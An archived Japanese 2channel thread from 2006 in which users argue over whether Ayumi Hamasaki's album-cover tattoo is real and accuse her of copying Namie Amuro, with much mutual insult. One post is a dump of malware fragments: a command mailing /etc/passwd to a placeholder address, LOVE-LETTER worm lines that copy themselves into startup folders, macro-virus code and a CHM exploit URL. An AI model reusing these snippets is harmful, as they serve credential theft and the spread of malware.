5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

あゆ 初タトゥー入れちゃった…

1 :どっちの名無しさん?:2006/11/09(木) 11:38:58
あゆ 初タトゥー入れちゃった…
 歌手・浜崎あゆみ(28)がニューアルバム
「Secret」(29日発売)のジャケットで
タトゥー姿を初披露していることが8日、分かった。
ライブでシンボルの「A」マークを張ったことはあるが、
タトゥーは初。真っ白だったはずの右肩には本物の
入れ墨彫り師が約3時間かけて描いたユニコーンが描かれた。
“絵”ではあるが、その精巧さに誰もが目を奪われる。
アルバムはパナソニックのCMソング「1LOVE」など
14曲中10曲が新曲。あゆは「すべてが自信作。
多くの方がこの子たちを聴き、味わってほしいです」
と手応えを感じている。



2 :どっちの名無しさん?:2006/11/09(木) 12:59:08
2ゲット♪あゆももうおしまい。入れ墨入れたら人気も急降下♪

3 :どっちの名無しさん?:2006/11/09(木) 13:05:23
てか前から小さいけど長瀬とペアで刺青入れてたから別に今更いいじゃん。
似合ってればいいでしょ、汚い刺青じゃなければいいんじゃない。

4 :どっちの名無しさん?:2006/11/09(木) 13:18:19
ただの絵だってw
>>1読めよw

5 :どっちの名無しさん?:2006/11/09(木) 13:19:57
残念だ、非常に。だがファンは辞めないつもり。

6 :どっちの名無しさん?:2006/11/09(木) 13:23:13
B'zの稲葉さんのは本物?

7 :どっちの名無しさん?:2006/11/09(木) 13:26:00
タトゥー=絵じゃないの?

8 :どっちの名無しさん?:2006/11/09(木) 13:26:18
ちょっとショックかも・・・

9 :どっちの名無しさん?:2006/11/09(木) 13:29:20
「絵」をどう捕らえるかだな〜

タトゥーが偽物ということを意味してるのか
ユニコーンの絵という意味なのか

10 :どっちの名無しさん?:2006/11/09(木) 13:30:24
売れてないもんだから
ハマもとうとう小細工に走ったかw

11 :どっちの名無しさん?:2006/11/09(木) 13:40:53
まぁなんというか
浜崎アホだなとw

12 :どっちの名無しさん?:2006/11/09(木) 13:44:48
28にもなって刺青とはミーハー気取りですか

13 :どっちの名無しさん?:2006/11/09(木) 13:44:58
絵なんだから、文句ない♪
本当に彫ってたら、趣味疑うけど。

てか、ジャケカッコイイ!!

14 :どっちの名無しさん?:2006/11/09(木) 13:47:36
絵だってダサいでしょ・。

15 :どっちの名無しさん?:2006/11/09(木) 13:52:54
これ本物?


16 :どっちの名無しさん?:2006/11/09(木) 13:52:56
女の子がタトゥーしちゃだめだよ

17 :どっちの名無しさん?:2006/11/09(木) 14:11:28
んなこたーない(AA略

18 :どっちの名無しさん?:2006/11/09(木) 14:31:27
タトゥーできたらある意味尊敬するよ、
途轍もなく痛いんだろ?絶叫するぐらいに、、

19 :どっちの名無しさん?:2006/11/09(木) 14:34:30
ユニコーンのタトゥーとかダサッwww

20 :どっちの名無しさん?:2006/11/09(木) 14:36:47
自信作ねぇ…

21 :どっちの名無しさん?:2006/11/09(木) 14:39:51
ヤクザの情婦にされた女って入れ墨させられてるよねぁゅも?

22 :どっちの名無しさん?:2006/11/09(木) 14:42:22
安室の真似

23 :どっちの名無しさん?:2006/11/09(木) 14:47:13
>>22へっー。

24 :山本:2006/11/09(木) 14:55:12
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???




25 :どっちの名無しさん?:2006/11/09(木) 15:00:36
また浜崎が新たなパクリしでかした!
http://img.hmv.co.jp/image/jacket/400/12/1/7/045.jpg

アムロのCAN’T SLEEP,CAN’T EAT,I’M SICKにそっくり

しかもポーズだけでなく髪型も同じ! タトゥーもアムロのマネ!
http://ec2.images-amazon.com/images/P/B000F6YVJU.01._AA240_SCLZZZZZZZ_V54495864_.jpg

26 :どっちの名無しさん?:2006/11/09(木) 15:07:20
タトゥー入れたってただの絵を肩に書いただけだからな笑
勘違いしてる奴等はゴミ知能か??

27 :どっちの名無しさん?:2006/11/09(木) 15:16:04
長瀬とのプライベートフォトのタトゥーも絵?

28 :どっちの名無しさん?:2006/11/09(木) 15:17:18
>>27
もちろん絵

29 :どっちの名無しさん?:2006/11/09(木) 15:39:48
みたい!!
みれないんだけど・・・なんでだ!?

30 :どっちの名無しさん?:2006/11/09(木) 15:52:28
本当に彫ったらしいよ

31 :どっちの名無しさん?:2006/11/09(木) 15:55:56
まじで!?かわいい??みたいよ〜!!

32 :どっちの名無しさん?:2006/11/09(木) 16:06:09
>>30
やるかよw

33 :どっちの名無しさん?:2006/11/09(木) 16:12:08
あゆは体を傷つける事はしないよ

34 :どっちの名無しさん?:2006/11/09(木) 16:18:10
絵って書いてあるってことは彫ってはないね。良かった。

35 :どっちの名無しさん?:2006/11/09(木) 16:31:49
>>30
3時間で彫れるわけねーだろ。バカか。

36 :どっちの名無しさん?:2006/11/09(木) 16:33:01
でもロゴに被せて描いてあるけど本当にロゴは彫ってるみたいだよ

37 :どっちの名無しさん?:2006/11/09(木) 16:36:09
お昼の番組で「絵ですね。彫ってはないですね。」と
芸能記者が言っておりました。

38 :どっちの名無しさん?:2006/11/09(木) 16:36:36
>>36
もう馬鹿みてーな発言しないでいいから永眠してろ、なっ。

39 :どっちの名無しさん?:2006/11/09(木) 16:38:09
>>30
あゆは安室みたいにバカじゃねーよw

40 :どっちの名無しさん?:2006/11/09(木) 16:38:10
このジャケの撮影の時はまだ太ってないんだねえ。

41 :どっちの名無しさん?:2006/11/09(木) 16:40:38
ジャケ写の出来がかなり良いのでアンチ必死wwwwww

42 :どっちの名無しさん?:2006/11/09(木) 16:41:09
馬?のタトゥーって
ちょっとダサくない?

43 :どっちの名無しさん?:2006/11/09(木) 16:41:34
ユニコーン

44 :どっちの名無しさん?:2006/11/09(木) 16:43:38
ちょw馬てwww
ユニコーンも知らないのかよwwww

45 :どっちの名無しさん?:2006/11/09(木) 16:44:13
ジャケ写ね〜

46 :どっちの名無しさん?:2006/11/09(木) 17:22:35
ユニコーンの右肩にAロゴみたいなのあるけど、ロゴなんかな〜?
ユニコーンに合わせてデザイン変えてるのかな??


47 :どっちの名無しさん?:2006/11/09(木) 17:24:01
ロゴ変わったw

48 :どっちの名無しさん?:2006/11/09(木) 17:32:48
新しいロゴ、なんかちょっとダサクない?

49 :どっちの名無しさん?:2006/11/09(木) 17:52:04
もろダサいよ〜っ!

50 :どっちの名無しさん?:2006/11/09(木) 19:09:05
ユニコーンとかダサイwww浜崎センス悪ッ

51 :どっちの名無しさん?:2006/11/09(木) 19:11:53
スティービー・ワンダーとデスティニーズ・チャイルドにボーカルを絶賛された
容姿とスター性と歌唱力、天性の歌声を兼ね備えた日本が生んだ奇跡の歌姫 愛内里菜


<<愛内里菜の魅力♪>>
「絶対的な歌唱力」
ライブでCD以上の迫力で歌い上げる本格派!上手い!
声量があり音域も広く、低音域は渋く、中音域は安定、高音域は
ファルセットも使って突き抜ける。
「楽曲の素晴らしさ」
日本人のもっとも好む「哀愁」とヌケのいいダンスサウンドが武器。
全ての楽曲について言えることはメロディーがしっかりしており、
Cメロ・Dメロまで展開する曲も多い。旧小室ファン、ビーイングファン
を中心に邦楽ファンの大多数たるライトリスナーを虜にするものである。
さらにバラードがまた切なくて絶品。
「ルックス」
コンパに来れば間違いなく一番人気というリアルな可愛さを誇る。
しかも廃刊ファッション誌の元モデル。さらに元ギャル。
「キャラ」
歌声とはあまりに遠いアニメ声はお茶の間の話題を独り占めに!
ほんわかした性格の良さは作り上げられた癒し系タレントを抑えて余りある。

至宝の名曲 Rainbow(live)
http://orange-night.dyndns.org/UpRINA/src/up0293.mp3
伝説の名盤 Be Happy
http://www.youtube.com/watch?v=5AEVuVUtXYw&mode=related&search=

52 :どっちの名無しさん?:2006/11/09(木) 19:13:43
タトゥー見たけど、子供が描いたのかとオモタ

53 :どっちの名無しさん?:2006/11/09(木) 19:17:31
>>52
あなたがどれだけペイントがうまいのか見てみたいですわ

54 :どっちの名無しさん?:2006/11/09(木) 20:05:06
タトゥーとかイラナイヨ
あゅちゃん

55 :どっちの名無しさん?:2006/11/09(木) 20:07:42
このジャケはマジ失敗だね…


56 :どっちの名無しさん?:2006/11/09(木) 20:12:39
アンチの自演は果てしなく続く

57 :どっちの名無しさん?:2006/11/09(木) 20:18:51
安室の真似w

58 :どっちの名無しさん?:2006/11/09(木) 20:46:16
アムロの真似しても
ハマは顔がデカすぎて(ry
バランスおかしいよ

59 :どっちの名無しさん?:2006/11/09(木) 20:50:34
>>58タトゥーに顔の大きさって関係あるんだ……。 知らなかったなぁw

60 :どっちの名無しさん?:2006/11/09(木) 21:18:46
だからタトゥじゃなくてただの絵を肩に書いてもらっただけだよwwww
風呂入ったら落ちるあれだよあれwwww

61 :どっちの名無しさん?:2006/11/09(木) 21:28:27
ダッッッさ!!

62 :どっちの名無しさん?:2006/11/09(木) 21:38:22
前に雑誌でタトゥー入れてる人について、アユは『若いねぇ・・』って何かバカにしたようなかんじだったけど、まさかアユが入れるとは・・

63 :どっちの名無しさん?:2006/11/09(木) 21:41:10
ババアにタトゥーは似合わないwwww安室チャンは似合うのに浜崎には違和感ある…顔の老け具合のせい?

64 :どっちの名無しさん?:2006/11/09(木) 23:45:49
体型で似合う似合わないは、やっぱしあるね。

65 :どっちの名無しさん?:2006/11/09(木) 23:59:11
ダサさ全開だなwwwwwwwwwwww

66 :どっちの名無しさん?:2006/11/10(金) 00:27:56
早速画像が・・・・
http://www.degitalscope.com/~mbspro/userfiles_res/hamapaku/

67 :どっちの名無しさん?:2006/11/10(金) 00:45:44
>>66
明らかに盗作だなwwww懲りない婆だwwwwwwwwwwwww

68 :どっちの名無しさん?:2006/11/10(金) 00:55:56
激似だわ、こりゃw

69 :どっちの名無しさん?:2006/11/10(金) 01:06:57
ださハマサキ

70 :どっちの名無しさん?:2006/11/10(金) 01:10:51
449 名前:エポケ ◆f7YBJqqsAY :2006/09/19(火) 20:40:29
あゆラボとか言う、訳のわからんニートのハマヲタさんでネカマやな。ワラ
やっぱ亜美がサイコーやな。
出来れば、オッパイチュチュしたい人やな。ワラ

ハマさんはそりゃ、アクセサリーガチャガチャつけた「成金ババァ」みたいなもんで「下品」なんよ。
「上品」っつーのは、「精神性が深くて高い」っつーことやわさ。

Channel-aとかでも、ナレーションでアーチストがどうのこうのと、
躍起になって価値を高めようとしてるが、そのこと自体が、「軽薄の証拠」なんやわさ。

「精神性が深くて高い」っつーことは「無言」っつーことなんよ。
まあこれも意味わからんでしょうけどな。

ハマはもう終わりやしな。
ついでにコウダもな、亜美の時代やからな。ワラ

71 :どっちの名無しさん?:2006/11/10(金) 01:13:46
   ア ム ロ の マ  ネ wwwwwwww
 
 
 
 

72 :どっちの名無しさん?:2006/11/10(金) 01:16:25
やはり盗作でしたwwwwコソドロ浜崎wwww
http://www.degitalscope.com/~mbspro/userfiles_res/hamapaku/


73 :どっちの名無しさん?:2006/11/10(金) 01:23:42
449 名前:エポケ ◆f7YBJqqsAY :2006/09/19(火) 20:40:29
やっぱ亜美がサイコーやな。
出来れば、オッパイチュチュしたい人やな。ワラ

923:エポケ◆f7YBJqqsAY :2006/11/02(木) 19:33:34
あみーごさんみたいなキャシャで貧乳タイプの女性

74 :どっちの名無しさん?:2006/11/10(金) 01:45:04
チュパチュパチュパチュパチュパチュパチュパチュパチュパチュパチュパチュパチュパチュパチュパ

75 :どっちの名無しさん?:2006/11/10(金) 01:45:55
 
   
 
    
   ア ム ロ の パ ク リ  wwwwwwww 
 
  
     

76 :どっちの名無しさん?:2006/11/10(金) 01:49:21
安室みたいなDQNの真似しないでくれよ
タトゥなんかいらないよ

77 :どっちの名無しさん?:2006/11/10(金) 01:52:55
>>25

ジャケもアムロのパクリwwww



78 :固定ファン ◆tr.t4dJfuU :2006/11/10(金) 01:58:27
以下は ....

” 国 内 ・ 海 外 ア ー テ ィ ス ト を 中 傷 す る 人 ” で す。

「 コピペ連投 」
「 Wwww...連投 」 
「 HN変更連投 」 等を見かけた場合は....

危険な人物ですので
スルーしましょう。

79 :どっちの名無しさん?:2006/11/10(金) 02:12:40
 
安室の真似wwwwwwwww

 
 

80 :ななしっくす:2006/11/10(金) 02:37:44
変化を恐れるなら離れたとこからみててよ 何かしたってしなくたって結局指さされるなら あるがままに〜 あゆはあるがままに生きてるんだよ

81 :どっちの名無しさん?:2006/11/10(金) 03:12:49
きんもー

82 :どっちの名無しさん?:2006/11/10(金) 03:48:46
老馬の顔、足らへんのピーナッツ(?)の入れ墨が蓮コラ風

83 :どっちの名無しさん?:2006/11/10(金) 04:01:22
彫り師から見るかぎりタトゥ―じゃないよ。体に墨入れた場合あそこまで光りません。色も浮き上がっているし絵です。

84 :どっちの名無しさん?:2006/11/10(金) 05:14:04
浜崎ダサイwwwこれでまたファン減るね。

85 :どっちの名無しさん?:2006/11/10(金) 05:19:19
つか、これが本物のタトゥーだったらヲタでも浜崎の事センスいいとは言えんよなwwwダサすぎだろww

86 :どっちの名無しさん?:2006/11/10(金) 07:49:24
   
 
    
   ア ム ロ の パ ク リ  wwwwwwww 
 
  
     

87 :どっちの名無しさん?:2006/11/10(金) 08:02:37
つーか、豚あゆの二の腕がこんなに細いわけねーじゃん

88 :どっちの名無しさん?:2006/11/10(金) 09:29:00
ここは自演スレでつか?

89 :どっちの名無しさん?:2006/11/10(金) 10:24:35
なーんだ偽物なのか・・・。
あゆってホント偽物が好きだね。

90 :どっちの名無しさん?:2006/11/10(金) 12:40:56
安室ヲタのDQNブスどもうぜえな
あんな汚ギャルぱくる価値もないだろw

91 :どっちの名無しさん?:2006/11/10(金) 12:57:35
>>90
それをパクッてる浜崎は更に価値がないwwwwwwwwwwwwwwww

92 :どっちの名無しさん?:2006/11/10(金) 12:59:11
DQNブス=浜崎&浜ヲタ汚ギャル軍団

93 :どっちの名無しさん?:2006/11/10(金) 13:19:41
親愛なるあゆみ姫今日の君もいちだんと美人&可愛いではないか。あ〜なんて綺麗なんだ。僕の紳士的なペニスでさえ元気になってしまうではないか...。あ〜なんて、美しいものとは罪な事なんだろう

94 :どっちの名無しさん?:2006/11/10(金) 14:54:20
>>91-92
ドキュンのブスニートは消えようねー
それと
来週のヘイヘイヘイのあゆ
http://bbs1.ryne.jp/d.php/image5/382/143
もう肩のユニコーンの絵は落ちてるけど
可愛すぎ

95 :どっちの名無しさん?:2006/11/10(金) 16:34:08
DQNといったらアムラーしかいないだろ
安室好きな男っているのか?
こいつ好きなやつ日焼けバカ女しかいないよな

96 :どっちの名無しさん?:2006/11/10(金) 16:47:57
>>95アムラーってw

97 :どっちの名無しさん?:2006/11/10(金) 16:49:44
汚ギャルの元祖だな
アムラー(笑)

98 :レコード店長 ◆tr.t4dJfuU :2006/11/10(金) 16:55:35
「 丸々コピー&ペースト 」連続投稿 
「 wwwwwww〜〜〜〜〜...」連続投稿  
「 ハンドルネーム変更」連続投稿、等を見かけた場合は....
” 邦楽・洋楽アーティストを中傷する人 ” です。

悪質な場合、営業妨害として警察に指名手配しますので
スルーして下さい。

投稿前は、必ず2ちゃんねるのガイドラインを見て承諾して下さい。
( 掲示板上方の「書き込む前に読んでね」をクリックして下さい。)
http://info.2ch.net/before.html

99 :どっちの名無しさん?:2006/11/10(金) 16:58:58
あのタトゥー、キモいだけやん。寄生虫が皮膚に出てきたみたいで。

100 :どっちの名無しさん?:2006/11/10(金) 16:59:42
アムラーはもうババァwwwwwww

101 :どっちの名無しさん?:2006/11/10(金) 17:01:35
>>99眼科に行ってください

102 :どっちの名無しさん?:2006/11/10(金) 17:44:04
タトゥーは本当に入れるなら痛くて3時間じゃ無理だよ??
私はhydeと同じタトゥー入れるのに1ヶ月かかったし。
なんでタトゥーと絵の区別が付かないの??
ってか今ではタトゥーシールとかもあるし入れたくない人でも簡単に
タトゥー入れたっぽくたるよ

103 :どっちの名無しさん?:2006/11/10(金) 17:47:54
馬を選んだ理由はマイアミでマドンナからインパクト受けますた!
ttp://static.flickr.com/80/251038149_62741997f1.jpg



104 :どっちの名無しさん?:2006/11/10(金) 17:52:48
B時間かけて描いてもらったんだよ!Aのやつは長瀬とくっつけたらハートなるからそれだけは彫ってるけど…あとは描いてもらったってあゆ言ってたよ。

105 :どっちの名無しさん?:2006/11/10(金) 18:12:19
>>103馬って………。

106 :どっちの名無しさん?:2006/11/10(金) 18:12:22
マジで入れたの?
ペガサスて

107 :どっちの名無しさん?:2006/11/10(金) 18:14:45
元祖ギャルは安室
安室・浜崎はギャルに支持されまくり。

108 :どっちの名無しさん?:2006/11/10(金) 18:16:44
うわぁーHYDEヲタまで来た!

109 :どっちの名無しさん?:2006/11/10(金) 18:17:11
ギャル支持
倖田>>>安室>>>>>>>>>浜崎

110 :どっちの名無しさん?:2006/11/10(金) 18:20:49
   
 
    
   ア ム ロ の パ ク リ  wwwwwwww 
 
  
     

111 :どっちの名無しさん?:2006/11/10(金) 18:21:17
汚ギャル安室なんかぱくらねーよブス

112 :どっちの名無しさん?:2006/11/10(金) 18:22:41
ジャケも安室のパクリWWWWWWWWWWWW

http://img.hmv.co.jp/image/jacket/400/12/1/7/045.jpg

アムロのCAN’T SLEEP,CAN’T EAT,I’M SICKにそっくり

しかもポーズだけでなく髪型も同じ! タトゥーもアムロのマネ!
http://ec2.images-amazon.com/images/P/B000F6YVJU.01._AA240_SCLZZZZZZZ_V54495864_.jpg

113 :どっちの名無しさん?:2006/11/10(金) 18:23:48
安室ブスだなぁ萎えまくり
あゆたん萌え

似ても似つかない

114 :どっちの名無しさん?:2006/11/10(金) 18:25:10
なんでこんな日焼けしてんだよこの猿女はw

115 :どっちの名無しさん?:2006/11/10(金) 18:28:38
安室というか資生堂の鈴木えみのCMみたい

116 :どっちの名無しさん?:2006/11/10(金) 18:35:29
あゆは絵だが
アムロは本物のタトゥーなんだろ?


117 :どっちの名無しさん?:2006/11/10(金) 18:39:22
>>116そうだよ。
確か子供が産まれた時ぐらいにタトゥー入れたんだよね?
間違ってなければ子供の名前とか描いてあるみたいだよ。


118 :◆lWWxCQ1b/6 :2006/11/10(金) 18:41:41
>>109
パラのイベよく行くけど倖田好きな奴いないんだけど。
安室ちゃん・あゆ好きなら超いるけど。

119 :どっちの名無しさん?:2006/11/10(金) 18:42:06
そのジャケの安室の右目はカメラ目線だけど左目はどっか変な方向いてる…なんかコワ

120 :どっちの名無しさん?:2006/11/10(金) 18:43:34
>>118
あっそ

121 :どっちの名無しさん?:2006/11/10(金) 18:44:41
マリオの神プレイ
音量小さめなので音量あげてからお楽しみ下さい
http://www.youtube.com/watch?v=Q8M7fuWjod0&eurl=


122 :どっちの名無しさん?:2006/11/10(金) 18:53:14
  
 
    
   ア ム ロ の パ ク リ  wwwwwwww 
 
  
     


123 :どっちの名無しさん?:2006/11/10(金) 19:06:33
浜崎気持ち悪い
浜ヲタ死んでほすい

124 :ぬこ田 ◆nukoFWfHcQ :2006/11/10(金) 19:22:44
美少女にタトゥーは似合わんのだよ!!
鮎って本当、浜崎あゆみというものが分かってないねえ
金髪巻き髪はかなりカワユス

125 :どっちの名無しさん?:2006/11/10(金) 19:23:04
倖田がキモイし。

126 :どっちの名無しさん?:2006/11/10(金) 19:27:03
浜詐欺バカ丸出しだよな
エラ張りの二の腕ブヨブヨのくせして、修正してて笑う

127 :ぬこ田 ◆nukoFWfHcQ :2006/11/10(金) 19:27:28
倖田來未ちゃんの曲、俺の友達の車で大体かかってるから覚えちゃったよ
また脳細胞を無駄にしてしまった
そして鮎の曲を覚えられなくなってきた

128 :レコード店長 ◆tr.t4dJfuU :2006/11/10(金) 20:21:56
「 丸々コピー&ペースト 」連続投稿 
「 wwwwwww〜〜〜〜〜...」連続投稿  
「 ハンドルネーム変更」連続投稿、等を見かけた場合は....
” 邦楽・洋楽アーティストを中傷する人 ” です。

陰湿悪質な場合、営業妨害として警察に指名手配しますので
スルーして下さい。

投稿前は、必ず2ちゃんねるのガイドラインを見て承諾して下さい。
( 掲示板上方の「書き込む前に読んでね」をクリックして下さい。)
http://info.2ch.net/before.html

129 :どっちの名無しさん?:2006/11/10(金) 20:23:43
浜詐欺のパクリは名誉毀損にでもなるの?
それとも、窃盗罪?

130 :ぬこ田 ◆nukoFWfHcQ :2006/11/10(金) 20:37:26
>>129
名誉毀損にはならない。これは、著作権の侵害だね。
裁判起こされるとしたら、損害賠償請求訴訟、著作権侵害禁止訴訟とか

131 :どっちの名無しさん?:2006/11/11(土) 00:04:27

 
    
   ア ム ロ の パ ク リ  wwwwwwww 
 
  
     


132 :ハードゲイ:2006/11/11(土) 00:37:09
タトゥFUー♪あゆフー♪

133 :どっちの名無しさん?:2006/11/11(土) 00:59:21
>>124
同意
安室みたいなDQNにはなってほしくない

134 :どっちの名無しさん?:2006/11/11(土) 02:08:53
>>83知ったか乙
タトゥーでも不自然なまでに光るから
マジレスすると黒を入れたらラインがボコっと浮き上がるから絵なのは確定。

135 :どっちの名無しさん?:2006/11/11(土) 03:23:47
随分ヘタクソなユニコーンだなwwwあれじゃ恥ずかしいわwwwわははははは

136 :どっちの名無しさん?:2006/11/11(土) 03:25:57
ヘタレバカ崎あほみダサッwwwwwww

137 :どっちの名無しさん?:2006/11/11(土) 03:30:31
アンチ=一匹のニート自演。


138 :どっちの名無しさん?:2006/11/11(土) 05:07:38
本気で入れる根性ねえなら
だっさい絵描いてキモイ肩見せてんじゃねえよ

139 :どっちの名無しさん?:2006/11/11(土) 06:10:16
なんちゃってなら、やらねえ方がマシなんだよな。

140 :ナミエタン:2006/11/11(土) 06:58:07
ほんとにアムロちゃんのジャケ似てるねぇ(゜ロ゜)
シークレット ってアルバムのタイトル?倖田が前に出したアルバムもシークレットだったよね(^-^;?よく同じのにしたねぇ… それか浜崎の余裕?

141 :どっちの名無しさん?:2006/11/11(土) 07:13:39
アムロちゃんとアユちゃんのスターティンも似てなくもないよね
てかあーゆー角度とかフツーに沢山アリソな気がス;

142 :どっちの名無しさん?:2006/11/11(土) 18:20:58
CD+DVDの方、二の腕のタトゥーをクローズアップしたデザインが
シャキーラのLaundry Service(2002)にそっくり

胸を腕で抱える仕草は
ジャネット・ジャクソンのDamita Jo(2004)のマネ

いい加減にしろ盗作企業
真似ても盗むな、だぁ?
盗んでるじゃねーか

143 :どっちの名無しさん?:2006/11/11(土) 18:40:41
ハマのスターティンはジェニファーロペスのジャケからの盗作だろ
背景と衣裳の白黒を逆転させただけじゃん

144 :どっちの名無しさん?:2006/11/11(土) 19:05:29
タトゥーを彫りたかったんじゃなくて
タトゥーを使った演出をパクりたくて画で済ませたんだろw

いつもの盗み病だよ

145 :どっちの名無しさん?:2006/11/11(土) 19:07:48
なんでもパクリにすればいいって感じだね、馬鹿なニート共。

146 :どっちの名無しさん?:2006/11/11(土) 19:56:24
タトゥーを馬鹿にするなよ!!
浜崎

147 :どっちの名無しさん?:2006/11/11(土) 19:57:05

 
    
   ア ム ロ の パ ク リ  wwwwwwww 
 
  
     



148 :どっちの名無しさん?:2006/11/11(土) 19:58:34
なんでもパクってるじゃん(笑)

盗作による自転車操業のエイベッ糞さーん

149 :どっちの名無しさん?:2006/11/11(土) 20:31:48
なんかハマがやる事って
誰かしらに似てる…

150 :どっちの名無しさん?:2006/11/11(土) 21:01:05
安室ヲタのDQNブスどもは2ch来るなよ

151 :どっちの名無しさん?:2006/11/11(土) 21:01:07
堂々巡りでおk?

152 :レコード店長 ◆tr.t4dJfuU :2006/11/11(土) 21:04:02

「 丸々コピー&ペースト 」連続投稿・「事実無根の内容」連続投稿
「 wwwwwww〜〜〜〜〜...」連続投稿  
「 ハンドルネーム変更」連続投稿、等を見かけた場合は....
” 邦楽・洋楽アーティストを誹謗中傷するニート ” です。
http://tv8.2ch.net/test/read.cgi/ami/1154808455/65-66
悪質な場合、陰湿な営業妨害としてこの”危険人物”を警察に指名手配しますので
スルーして下さい。

投稿する人は、必ず2ちゃんねるのガイドラインを見て承諾して下さい。
( 掲示板上方の「書き込む前に読んでね」をクリックして下さい。)
http://info.2ch.net/before.html

153 :どっちの名無しさん?:2006/11/11(土) 21:04:50
     /          \_
    /  .|            \ヽ
   ,|   _| __l┴┴┴┴┴┴┴| |
   |   l `| |  ヽ.___/ヽ__/|  |
   |    ヽ6||   ( ●) || ( ●)l  | 
  ,|    |` 〈     ̄  | |  ̄ .〉 |       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |     .||    ヽ__,/(`  ´)ヽノ |     < パクリハマ氏ね!安室ちゃんサイコ〜☆
  |     |. l    {ヽ   `─´/|  |       \________
 ,|     | ヽ   ヽ/=====ヽ/  | カタカタカタカタカタカタカタカタカタカタ
  |     .|   \.  ヽ=====/.|   | _____
 .|    .|    \_________/ .|  |  |   \  \
  |     .|   // \ /ヽ\|__|  |     | ̄ ̄|
 .|     |  /  \  ∞ノ     |  |     |__|
  |     |  | \   ̄ ̄ ̄ミつ   |  |__/  /
  .|     | /    ̄ ̄ ̄ ̄ | ̄ ̄ ̄ ̄|  〔 ̄ ̄〕
  |     ||        | ̄




154 :どっちの名無しさん:2006/11/12(日) 02:36:10
塚タトゥーごときで騒ぎすぎだろ!


155 :言っとくけど:2006/11/12(日) 02:56:15
立てたの俺じゃねえよ

156 :どっちの名無しさん?:2006/11/12(日) 04:22:45
安室ヲタが騒いでるだけ

157 :どっちの名無しさん?:2006/11/12(日) 05:28:04
お浜さん

158 :どっちの名無しさん?:2006/11/12(日) 09:20:40
>>152
どうでもいいけど日本語おかしいよ、自治厨。

159 :どっちの名無しさん?:2006/11/12(日) 11:18:12

 
    
   ア ム ロ の パ ク リ  wwwwwwww 
 
  
   ジャケもアムロのパクリwww >>25

  
 

160 :どっちの名無しさん?:2006/11/12(日) 21:18:00
長瀬はNって入ってたよね

161 :どっちの名無しさん?:2006/11/12(日) 22:17:11
Nなんて入れてないよ。

162 :どっちの名無しさん?:2006/11/13(月) 01:50:57
「A」 「H」
 「&」
「T」 「N」

163 :どっちの名無しさん?:2006/11/13(月) 04:16:32
画像うpよろ

164 :どっちの名無しさん?:2006/11/13(月) 08:54:10
あゆダサくなっちゃったねoo

165 :どっちの名無しさん?:2006/11/13(月) 09:13:18
http://plaza.rakuten.co.jp/angelblue10000/diary/200610310000/

166 :名無し:2006/11/13(月) 09:57:16
お騒がせコンビ加入乙!

167 :どっちの名無しさん?:2006/11/13(月) 21:35:55
最近入れに行ったら彫師言ってたけどアムロの文字タトゥー女性に人気あるって


168 :どっちの名無しさん?:2006/11/13(月) 21:50:33
さすが歌姫安室奈美恵

169 :どっちの名無しさん?:2006/11/13(月) 23:16:59
安室ヲタ浜崎叩きに必死ですね。
人生無駄に生きてるね

170 :どっちの名無しさん?:2006/11/13(月) 23:19:11
>>169
インチキ浜崎ひっしで応援してるおまえらこそ、人生無駄に生きてるね

171 :どっちの名無しさん?:2006/11/13(月) 23:26:10
お前に言われたくない。

172 :どっちの名無しさん?:2006/11/14(火) 00:44:00
>>170そればかりはアンチに言われたくないな。

173 :どっちの名無しさん?:2006/11/14(火) 15:32:17
安室がしたらカッコイイのに浜崎がしたらなぜこんなにダサイのかoo浜崎はしょせんパクったから?

174 :どっちの名無しさん?:2006/11/14(火) 16:20:58
恐ろしく似合わない

175 :どっちの名無しさん?:2006/11/15(水) 00:30:47
ロゴ変わったんじゃなくて、あれはTとAをかぶせてるよね。
たしか前に出てた長瀬との写真のやつのまんまだもの。
あの部分だけはもしかしたら本物かもね。
まーでも長瀬は俳優業があるから入れられないと思うけど。

176 :どっちの名無しさん?:2006/11/15(水) 00:58:16
>>175長瀬は分からないけど多分あゆの場合ロゴは本物。

177 :どっちの名無しさん?:2006/11/15(水) 01:40:30
前からいれてたヤツっぽいね

178 :どっちの名無しさん?:2006/11/15(水) 02:02:25
 
    
   ア ム ロ の パ ク リ  wwwwwwww 
 
  
   ジャケもアムロのパクリwww >>25

  
 

179 :どっちの名無しさん?:2006/11/15(水) 02:04:58
>>173
安質がかっこいいてw
DQNの感性は俺にはわかりません><

180 :どっちの名無しさん?:2006/11/15(水) 11:52:13
やっぱ本物

181 :どっちの名無しさん?:2006/11/15(水) 11:58:25
ロゴは本物だよ。
某画像サイトに検証画像あったけど位置も形も殆ど同じと言って良い程、同じ!

182 :どっちの名無しさん?:2006/11/15(水) 12:14:26
